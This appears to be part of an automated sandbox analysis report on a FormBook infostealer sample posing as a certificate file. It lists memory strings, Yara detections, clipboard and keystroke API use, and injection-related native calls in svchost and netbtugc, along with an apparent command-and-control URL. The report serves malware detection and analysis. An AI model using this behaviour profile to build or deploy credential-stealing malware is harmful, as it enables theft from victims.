            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2030686300.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4136427268.000000000485A000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.0000000003AFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4137916107.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00616B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00616B0C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00616D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00616D07
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00616B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00616B0C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00602B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00602B37
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0062F7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: This is a third-party compiled AutoIt script.0_2_005C3D19
            Source: Certificate 11-18720.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-18720.exe, 00000000.00000000.1677354791.000000000066E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_83ddf722-c
            Source: Certificate 11-18720.exe, 00000000.00000000.1677354791.000000000066E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: _SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9a7af845-5
            Source: Certificate 11-18720.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c3eafab4-2
            Source: Certificate 11-18720.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_397da7d6-d
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B363 NtClose,1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D74340 NtSetContextThread,LdrInitializeThunk,3_2_02D74340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D74650 NtSuspendThread,LdrInitializeThunk,3_2_02D74650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72AD0 NtReadFile,LdrInitializeThunk,3_2_02D72AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72AF0 NtWriteFile,LdrInitializeThunk,3_2_02D72AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_02D72BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72BE0 NtQueryValueKey,LdrInitializeThunk,3_2_02D72BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_02D72BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72B60 NtClose,LdrInitializeThunk,3_2_02D72B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72EE0 NtQueueApcThread,LdrInitializeThunk,3_2_02D72EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_02D72E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72FE0 NtCreateFile,LdrInitializeThunk,3_2_02D72FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72FB0 NtResumeThread,LdrInitializeThunk,3_2_02D72FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72F30 NtCreateSection,LdrInitializeThunk,3_2_02D72F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_02D72CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02D72C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72C60 NtCreateKey,LdrInitializeThunk,3_2_02D72C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72DD0 NtDelayExecution,LdrInitializeThunk,3_2_02D72DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02D72DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72D10 NtMapViewOfSection,LdrInitializeThunk,3_2_02D72D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_02D72D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D735C0 NtCreateMutant,LdrInitializeThunk,3_2_02D735C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D739B0 NtGetContextThread,LdrInitializeThunk,3_2_02D739B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72AB0 NtWaitForSingleObject,3_2_02D72AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72B80 NtQueryInformationFile,3_2_02D72B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72EA0 NtAdjustPrivilegesToken,3_2_02D72EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72E30 NtWriteVirtualMemory,3_2_02D72E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72F90 NtProtectVirtualMemory,3_2_02D72F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72FA0 NtQuerySection,3_2_02D72FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72F60 NtCreateProcessEx,3_2_02D72F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72CC0 NtQueryVirtualMemory,3_2_02D72CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72CF0 NtOpenProcess,3_2_02D72CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72C00 NtQueryInformationProcess,3_2_02D72C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72DB0 NtEnumerateKey,3_2_02D72DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72D00 NtSetInformationFile,3_2_02D72D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73090 NtSetValueKey,3_2_02D73090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73010 NtOpenDirectoryObject,3_2_02D73010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73D70 NtOpenThread,3_2_02D73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73D10 NtOpenProcessToken,3_2_02D73D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477920 NtCreateFile,3_2_00477920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477A70 NtReadFile,3_2_00477A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477B50 NtDeleteFile,3_2_00477B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477BE0 NtClose,3_2_00477BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477D30 NtAllocateVirtualMemory,3_2_00477D30
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00606606
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005FACC5
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006079D3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EB0430_2_005EB043
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005D32000_2_005D3200
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005D3B700_2_005D3B70
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F410F0_2_005F410F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E02A40_2_005E02A4
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F038E0_2_005F038E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005CE3B00_2_005CE3B0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F467F0_2_005F467F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E06D90_2_005E06D9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062AACE0_2_0062AACE
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F4BEF0_2_005F4BEF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005ECCC10_2_005ECCC1
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005CAF500_2_005CAF50
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C6F070_2_005C6F07
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DB11F0_2_005DB11F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006231BC0_2_006231BC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005ED1B90_2_005ED1B9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F724D0_2_005F724D
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E123A0_2_005E123A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006013CA0_2_006013CA
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C93F00_2_005C93F0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DF5630_2_005DF563
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C96C00_2_005C96C0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060B6CC0_2_0060B6CC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062F7FF0_2_0062F7FF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C77B00_2_005C77B0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F79C90_2_005F79C9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DFA570_2_005DFA57
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C9B600_2_005C9B60
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C7D190_2_005C7D19
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DFE6F0_2_005DFE6F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E9ED00_2_005E9ED0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C7FA30_2_005C7FA3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F476280_2_00F47628
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168711_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168731_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012901_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004035001_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040268A1_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026981_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF4A1_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D7531_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
